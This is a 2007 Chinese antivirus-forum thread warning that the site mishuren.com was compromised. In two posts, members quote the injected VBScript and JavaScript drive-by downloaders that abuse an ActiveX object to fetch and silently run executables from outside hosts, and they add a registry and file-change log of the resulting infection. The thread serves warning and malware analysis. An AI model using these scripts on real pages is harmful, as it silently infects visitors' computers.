瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 “秘书人”网站带毒,大家访问要小心!

12   1  /  2  页   跳转

“秘书人”网站带毒,大家访问要小心!

收藏
雪凯俊男
头像
初生襁褓狮
  • 帖子:28
  • 注册: 2006-11-21
  • 来自:
发表于: 2007-01-25 16:15 | 只看楼主 短消息 资料
字号: 1楼

“秘书人”网站带毒,大家访问要小心!

瑞星提示“秘书人”(http://www.mishuren.com/)网站带病毒,大家注意了!

附件附件:

下载次数:1087
文件类型:image/pjpeg
文件大小:
上传时间:2007-1-25 16:15:06
描述:



最后编辑2007-01-25 18:09:44
分享到:
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-01-25 16:20 | 短消息 资料
字号: 2楼

去看看 哈哈哈
gototop
 
mopery
头像
卡卡技术团队
  • 帖子:17737
  • 注册: 2005-12-06
  • 来自:New York
卡卡名人堂论坛9周年纪念
发表于: 2007-01-25 16:27 | 短消息 资料
字号: 3楼

<script language='JavaScript' type='text/JavaScript' src='/js/menu.js'></script>

被挂..应该是广告被挂..

<html>

<head>

<script language="VBScript">

function rechange(k)

s=Split(k,",")

t=""

For i = 0 To UBound(s)

t=t+Chr(eval(s(i)))

Next

rechange=t

End Function

t="on error resume next
download = "http://msexe.3322.org/flash.exe"
Set Non1 = document.createElement("object")
FuckingID = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Non1.setAttribute "classid", FuckingID
NonStr="Microsoft.XMLHTTP"
Set Non = Non1.CreateObject(NonStr,"")
NonStr1="Ado"
NonStr2="db."
NonStr3="Str"
NonStr4="eam"
NonStr5=NonStr1&NonStr2&NonStr3&NonStr4
NonStr6=NonStr5
set SSSS = Non1.createobject(NonStr6,"")
SSSS.type = 1
NonStr7="GET"
Non.Open NonStr7, download, False
Non.Send
filename="Wolvez.Com"
set Fso = Non1.createobject("Scripting.FileSystemObject","")
set tmp = Fso.GetSpecialFolder(2)
filename= Fso.BuildPath(tmp,filename)
SSSS.open
SSSS.write Non.responseBody
SSSS.savetofile filename,2
SSSS.close
set Exe = Non1.createobject("Shell.Application","")
Exe.ShellExecute filename,"","","open",0"

i=t

execute(rechange(I))

</script>

</head>

</html>
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-01-25 16:32 | 短消息 资料
字号: 4楼

恩 是哪个广告  我去拿虚拟机玩了一下  居然包括威金  好像是  我惨!!!!!!!!!!
gototop
 
mopery
头像
卡卡技术团队
  • 帖子:17737
  • 注册: 2005-12-06
  • 来自:New York
卡卡名人堂论坛9周年纪念
发表于: 2007-01-25 16:33 | 短消息 资料
字号: 5楼

就挂了一个.. 好象是个下载器..
gototop
 
叶·幽思
头像
横据古稀狮
  • 帖子:7280
  • 注册: 2005-09-01
  • 来自:Town
冰激凌
发表于: 2007-01-25 16:33 | 短消息 资料
字号: 6楼

中天那论坛也有问题

附件附件:

下载次数:1013
文件类型:image/pjpeg
文件大小:
上传时间:2007-1-25 16:33:32
描述:
gototop
 
deadmanzj
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-07-24
  • 来自:
发表于: 2007-01-25 16:38 | 短消息 资料
字号: 7楼

就一个??M,你看仔细了


function gn(n) { var number = Math.random()*n; return 'svchost'+'.exe'; } try { dl='http://www2.89111.cn/system.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }


下载'http://www2.89111.cn/system.exe',威金一个
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-01-25 16:38 | 短消息 资料
字号: 8楼

引用:
【mopery的贴子】就挂了一个.. 好象是个下载器..
………………

是下载器,但不是那么简单,它把我虚拟机给毁了。。。。。。

威金新变种 所有病毒瑞星都不认  哈哈
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-01-25 16:42 | 短消息 资料
字号: 9楼

看看下面是这个网站对注册表的和文件的添加及修改
REGSHOT  记录文件
个人注释:
日期时间:2007/1/25 08:14:56  ,  2007/1/25 08:15:25
计算机名:UFO-6BDC6C05846 , UFO-6BDC6C05846
用户名称:ufo , ufo

----------------------------------
添加主键:20
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DownloadManager
HKEY_LOCAL_MACHINE\SOFTWARE\Soft
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Security
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell

----------------------------------
添加键值:61
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ver_down0: "aaasfhauf1a56f4sa5d6ffa1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\load: "C:\WINDOWS\uninstall\rundl132.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Soft\DownloadWWW\auto: "1"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Control\ActiveService: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Service: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\0000\DeviceDesc: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CELINDRV\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Type: 0x00000010
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ErrorControl: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ImagePath: "C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\DisplayName: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\ObjectName: "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc\Description: "为远程计算机注册并更新 IP 地址。"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Control\ActiveService: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Service: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\0000\DeviceDesc: "CelInDrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CELINDRV\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Type: 0x00000010
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ErrorControl: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ImagePath: "C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\DisplayName: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ObjectName: "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Description: "为远程计算机注册并更新 IP 地址。"
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Type: 0x00000001
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Count: 0x00000002
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD96C556-65A3-11D0-983A-00C04FC29E36}\iexplore\Time: D7 07 01 00 04 00 19 00 08 00 0F 00 07 00 39 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PrivDiscUiShown: 0x00000001
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1: 14 00 1F 00 80 53 1C 87 A0 42 69 10 A2 EA 08 00 2B 30 30 9D 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\NodeSlot: 0x00000008
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: FF FF FF FF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MinPos800x600(1).x: 0xFFFF8300
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MinPos800x600(1).y: 0xFFFF8300
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MaxPos800x600(1).x: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\MaxPos800x600(1).y: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).left: 0x00000016
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).top: 0x0000001D
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).right: 0x0000026E
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WinPos800x600(1).bottom: 0x000001C8
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Rev: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\WFlags: 0x00000002
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\ShowCmd: 0x00000003
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\FFlags: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\HotKey: 0x00000000
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Buttons: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Links: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell\Address: 0xFFFFFFFF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ufo\LOCALS~1\Temp\Wolvez.Com: "Wolvez"
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-01-25 16:43 | 短消息 资料
字号: 10楼


----------------------------------
修改键值:6
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 60 DD 20 5E 1E E7 DB 0B CC DD CF 44 1B 72 16 C1 10 E3 FC AB 55 5B D8 9D A9 99 A4 55 2E DA 93 1C 68 CE 76 2A B7 5A EF E8 8F EA 1E 28 DB F3 DC 0D E4 F7 0A 64 A2 A4 35 8F F7 9E 2F 7C C2 84 64 73 0C 84 71 2C 4F 62 E6 06 17 92 3F 83 BC 04 C8 5E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 26 B3 C4 4E 5D 82 EA EB 5A 1B 9D 11 68 C4 E6 26 AC 53 54 9E C6 32 47 AC 03 FA 22 0B 29 D1 90 04 8A B8 4C CB 8B 5E 90 22 E6 26 77 B9 60 83 42 94 00 2A 9F 33 3F 3F 29 7A 12 BD 81 D8 65 F5 3E CB 3D C1 47 22 3B 1D 65 B2 53 4B E8 0F 85 2B BA 04
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name: "msoobe.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name: "iexplore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID: 0x3B7D853E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID: 0x41107B81
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 FF FF FF FF
HKEY_USERS\S-1-5-21-117609710-2025429265-725345543-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF

----------------------------------
添加文件:75
----------------------------------
C:\Documents and Settings\ufo\Cookies\ufo@www.mishuren[2].txt
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Documents and Settings\ufo\Local Settings\Temp\Wolvez.Com
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\20060405145810144[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\459367da7b473[1].jpg
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\459368b78c5ec[1].jpg
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\bg_all[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\CAYVQ3YL.htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\code[1].php
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\index_01[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\left_tdbg1[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\main_announce[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\qq[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\ShowClass_Menu[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\ShowSpecialList[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\system[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\tongji[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\voteView[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\1[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\405[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\a1[1].txt
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\a2[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\beijing888[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\click[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\cool[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\hengjiange[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\icon_0[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\index_02[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\left_tdbg2[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\main_title_575[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\newguest[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\sa[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YZWDIN\stm31[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\528438[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\a1[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\announce[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\article_common[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\blank[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\code[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\dbtl1[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\DefaultSkin[1].css
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\index_03[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\jiange888[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\mishuren[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\nologo[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\qq1[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\s[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\UserLogin[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KT2F8LMB\voteSubmit[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\a2[1].txt
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\ad[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\arrow3[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\arrow_r[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\article_elite[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\dbtl[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\flash[1].exe
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\google[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\icon2[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\left_title[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\menu[1].js
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\Soft_common[1].gif
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\stat[1].htm
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\tvlm[1].css
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\KXYBK5UV\wzclick[1].htm
C:\Program Files\Internet Explorer\SMSS.EXE
C:\Program Files\Internet Explorer\SVCHOST.EXE
C:\WINDOWS\Prefetch\NET.EXE-01A53C2F.pf
C:\WINDOWS\Prefetch\NET1.EXE-029B9DB4.pf
C:\WINDOWS\Prefetch\SMSS.EXE-11FFFDBB.pf
C:\WINDOWS\Prefetch\SVCHOST.EXE-16C7D411.pf
C:\WINDOWS\Prefetch\WOLVEZ.COM-3983CE74.pf
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\RichDll.dll
C:\WINDOWS\svchost.exe
C:\WINDOWS\uninstall\rundl132.exe

----------------------------------
修改文件:15
----------------------------------
C:\Documents and Settings\ufo\Cookies\index.dat
C:\Documents and Settings\ufo\Local Settings\History\History.IE5\MSHist012007012520070126\index.dat
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\ufo\NTUSER.DAT.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP

----------------------------------
添加目录:6
----------------------------------
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer\.
